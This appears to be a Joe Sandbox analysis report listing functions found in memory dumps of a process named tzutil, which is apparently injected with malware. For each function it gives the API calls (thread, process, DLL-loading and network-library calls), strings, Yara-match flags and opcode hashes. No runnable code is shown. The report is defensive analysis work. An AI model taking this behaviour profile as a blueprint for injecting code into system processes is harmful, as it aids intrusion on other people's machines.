                                                              Function 039F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 73fe57f81772754be70e53f8b5a353b23efef592857b760508805406e8e69836
                                                              • Instruction ID: 6061ff2149cdc1caf7753a447ef72523d81ac32d770925ba26dd83adc474c142
                                                              • Opcode Fuzzy Hash: 73fe57f81772754be70e53f8b5a353b23efef592857b760508805406e8e69836
                                                              • Instruction Fuzzy Hash: E6900221242845925545F1585404507400A97E0341796C013A1415994C862A9956D635
                                                              Function 039F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6ee543b7e7f29b4dfc3b36317524b3074f22beb1f8ba713e26a561731aeb0dad
                                                              • Instruction ID: abc4fd61adb98ff21e1449b350e582ba28c3febf3743d3cb70329a2805583b6f
                                                              • Opcode Fuzzy Hash: 6ee543b7e7f29b4dfc3b36317524b3074f22beb1f8ba713e26a561731aeb0dad
                                                              • Instruction Fuzzy Hash: 6790023120180853D111B1585504707000D87D0341F96C413A042559CD975A8A52A135
                                                              Function 039F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fa2fcb4ac5704086847a0aba71809defa68a3077e1e1f2ed02d15c5d9056a453
                                                              • Instruction ID: 241ab67a74e434f0d47a4146b769ebcb8ca4bbc84510ab9b288e8182af3361eb
                                                              • Opcode Fuzzy Hash: fa2fcb4ac5704086847a0aba71809defa68a3077e1e1f2ed02d15c5d9056a453
                                                              • Instruction Fuzzy Hash: EB90022921380442D180B158640860A000987D1302F96D416A001659CCCA1989695335
                                                              Function 039F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7918fa952d9b73be268cae24ba2b852691eca8fde16bcdd50e1d48222e0bf53e
                                                              • Instruction ID: 7ca026e5901e31ee785016af696316d4d52b37fc378b1e591c1fa56edd54894b
                                                              • Opcode Fuzzy Hash: 7918fa952d9b73be268cae24ba2b852691eca8fde16bcdd50e1d48222e0bf53e
                                                              • Instruction Fuzzy Hash: FE90022130180443D140B15864186064009D7E1301F56D012E0415598CDA1989565236
                                                              Function 039F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 644ec1d2c46886536939720e056a8691bcb4e9a149a050424028668c306395c8
                                                              • Instruction ID: 535d917ef126b9399704e1713ff6568e379fd40452c3fbdd5166789326882350
                                                              • Opcode Fuzzy Hash: 644ec1d2c46886536939720e056a8691bcb4e9a149a050424028668c306395c8
                                                              • Instruction Fuzzy Hash: 5090023120180842D100B5986408646000987E0301F56D012A5025599EC76989916135
                                                              Function 039F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 892999265728ba5ef09b23913f6eefb4d228172724636397d969ca05a149a1ed
                                                              • Instruction ID: 602e9f2fa079dc22f489373dcbe45e3000f6120967fc204f5bc721bd5988475e
                                                              • Opcode Fuzzy Hash: 892999265728ba5ef09b23913f6eefb4d228172724636397d969ca05a149a1ed
                                                              • Instruction Fuzzy Hash: 6990023120188C42D110B158940474A000987D0301F5AC412A442569CD879989917135
                                                              Function 039F2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 182b9ca1c3cdc4ab56ce6f6e3c87224842fd46a122a0d3faf5a052d440c606d5
                                                              • Instruction ID: 0ab1aa6576e49d9cd749ba256e009c62fb9453fced24829478e11e9f7ccea12a
                                                              • Opcode Fuzzy Hash: 182b9ca1c3cdc4ab56ce6f6e3c87224842fd46a122a0d3faf5a052d440c606d5
                                                              • Instruction Fuzzy Hash: 8690023120180C82D100B1585404B46000987E0301F56C017A0125698D8719C9517535
                                                              Function 039F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4ea382b4c099a7355f960b6e8da0a0fb6e1951656c1a94e5a31020783fd7139e
                                                              • Instruction ID: 17026e03b16432e246c91fd7705243b5bcbdd7849bbd7f68cc92904e541959d7
                                                              • Opcode Fuzzy Hash: 4ea382b4c099a7355f960b6e8da0a0fb6e1951656c1a94e5a31020783fd7139e
                                                              • Instruction Fuzzy Hash: 5190023160590842D100B1585514706100987D0301F66C412A04255ACD87998A5165B6
                                                              Function 039F39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 10ed370433a04703677a39e527a567ea8ef67af5c9976e1fe25e2173e8ad5419
                                                              • Instruction ID: 8d449e46cdba39f4c2891f07fa5c178fffedf26095bf212732a10599c7c4a535
                                                              • Opcode Fuzzy Hash: 10ed370433a04703677a39e527a567ea8ef67af5c9976e1fe25e2173e8ad5419
                                                              • Instruction Fuzzy Hash: 3290022124585542D150B15C54046164009A7E0301F56C022A08155D8D865989556235
                                                              Function 0321114D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 429 321114d-3211158 430 32111d8-3211247 call 322b890 call 322c2a0 call 3214990 call 32013e0 call 3222000 429->430 431 321115a-3211166 429->431 445 3211267-321126d 430->445 446 3211249-3211258 PostThreadMessageW 430->446 432 32111c3-32111d4 431->432 433 3211168 431->433 433->432 446->445 447 321125a-3211264 446->447 447->445
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 03211254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: d1aa6d2f37b84fe075a66538aa12b124caae1e2cf1a1ebade3796bc28cf5f9fe
                                                              • Instruction ID: ba39e92c9191660559eefbad701f004dae31b5dcdde23189b505674515d2ecdd
                                                              • Opcode Fuzzy Hash: d1aa6d2f37b84fe075a66538aa12b124caae1e2cf1a1ebade3796bc28cf5f9fe
                                                              • Instruction Fuzzy Hash: 77213776A1431C7EEB00EE949C82DEEBB7CEF40290B004169E904AB140D6749E6587E1
                                                              Function 032111D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 03211254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: cb65c5949d264f6dfddbe3e04f0d02becff97ea6d117dac3abb105f9e56e4b91
                                                              • Instruction ID: e701433b5924eaf890357dd8385874be7dc347ba1e814a9b5e02a06da732bb2c
                                                              • Opcode Fuzzy Hash: cb65c5949d264f6dfddbe3e04f0d02becff97ea6d117dac3abb105f9e56e4b91
                                                              • Instruction Fuzzy Hash: 6511A1B691035D7AEB10EBE49CC1DEFBB7CDF41694F048158FA04BB240E6745E458BA1
                                                              Function 032111E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 03211254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                              • Instruction ID: a31f7235dd7b93cdcd46f0a36e67cadb7a86ac74d6254eb124dc07f3810036c1
                                                              • Opcode Fuzzy Hash: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                              • Instruction Fuzzy Hash: 4601C4B6D1035C7AEB10EBE09C81DEFBB7C9F41694F048058FA04BB240E6745E458BA1
                                                              Function 03223E10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 03223EDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: c3fcf510093f2c6076039a929e9b56ab60fbd134cb2ede7f3546c4e514be9f82
                                                              • Instruction ID: 062026fd162a108fa5db46c96c99c23b83eb68631b44d57d19f5af436c761f92
                                                              • Opcode Fuzzy Hash: c3fcf510093f2c6076039a929e9b56ab60fbd134cb2ede7f3546c4e514be9f82
                                                              • Instruction Fuzzy Hash: 20317EB5A01706BBD714DFA4DC80FEBBBB9EB88710F044119E61D5B240D7B4AA40CFA4
                                                              Function 0321F8DD Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction ID: 197c253a961c254f445f6f77fe58328314383a95ceb4c33479a38214042c2d6c
                                                              • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction Fuzzy Hash: B8314176A1020AAFDB10DFD8CD809EFB7B9FF88304F108559E915EB214D775AE458BA0
                                                              Function 0321F8E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction ID: 1e0bcfd67ef7266e155384dc4861e834eaf2dc5893c3b911932b0a2986996a51
                                                              • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction Fuzzy Hash: 77314176A1020AAFDB00DFD8CD809EFB7B9FF88304B108559E915AB214D775EE458BA0
                                                              Function 03214A0B Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction ID: 0de05b9f6a1e507f1df4beff95a005aa088bf34b5965967af10961c1b7df2f00
                                                              • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction Fuzzy Hash: B521C1777102061FC311DA29D982BF9B778EB61315F1502D8E918CF280D6215A76C7D0
                                                              Function 03214A25 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214A02
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction ID: dfbeab8212b8a6e16c8ec892e91ac028f9efdb55e22ba0e5de8b21343bc54d84
                                                              • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction Fuzzy Hash: B42105376141478FCB11EE2AC5426E9FFF8EBA1714B1942D8D45CCF242D13295A68790
                                                              Function 03214990 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214A02
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: ee2ea82d2cf7f20c445d2bef04d0d2540910091b0c3ed06f7d64281f24d4b592
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: D4015EB9D5020EBBDB10EAA1DD41FDDB7B89B14308F0441A5E9089B240F671E758CB91
                                                              Function 03229B50 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,03218724,00000010,?,?,?,00000044,?,00000010,03218724,?,?,?), ref: 03229BB3
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction ID: 9f795cb4e75d49cfc3c0c86e4962799075c0889bf731b7d6ca2a6f2fda5f4dbc
                                                              • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction Fuzzy Hash: 1C01C0B6215208BFCB04DE99DC90EEB77ADEF8C754F508208FA09E7240D630F8518BA4
                                                              Function 03209F20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209F62
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction ID: a6ff4bba62494485b046277f86c3659ef952fbfe9317d7d286d369400c3843ac
                                                              • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction Fuzzy Hash: 15F06D3739031436E320A6E99C02FDBBB9C8B85B61F140026F60DEE1C0D9D2F58586A4
                                                              Function 03209F1A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209F62
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction ID: 57d99d16c0584bf7cc188f2b68b07331d6c087e90bdca41b569f715fb9060f42
                                                              • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction Fuzzy Hash: 05F02B373403103BE330A6A88C02FDFAB9C8F95B50F240119F609AF1C0C5D2B58587A4
                                                              Function 03229A90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(03211E59,?,03225F17,03211E59,?,03225F17,?,03211E59,032259BF,00001000,?,00000000), ref: 03229AC9
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction ID: 1ce23137b20b9f624b96aaec58e1f586579b014ac4f3b1dd22a4e8c24d682105
                                                              • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction Fuzzy Hash: C1E01A7A2143187BD714EF5ADC41F9B77ACEFC9710F004419FA48AB241DA71B9508BB8
                                                              Function 03229AD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,03214211,000000F4), ref: 03229B09
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction ID: e4985cc38719cd95a3de60c7e1971d0aeb05a83a8c0fd22d2a2052ae1b37442d
                                                              • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction Fuzzy Hash: 6BE09A76200304BBC620EF59DC41FAB77ACEFC9B10F004418F908AB241C670F8648BB4
                                                              Function 03218760 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0321878A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction ID: 0d6ca9f2eb92e2dfbd4c676ebe91df525ff70e7b52e2dd1b22e19d446ca2d166
                                                              • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction Fuzzy Hash: 4BE0267A6203042BFF10EAA89D81F6233884B8C730F0C0A50BA1CDB2C1D174F5928254
                                                              Function 03218560 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,03212150,032282FF,?,0321211B), ref: 03218591
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction ID: dac39781fae2c1e4820c0a4d3c9ed9fa5bed0cec77e1936b3271881412008a97
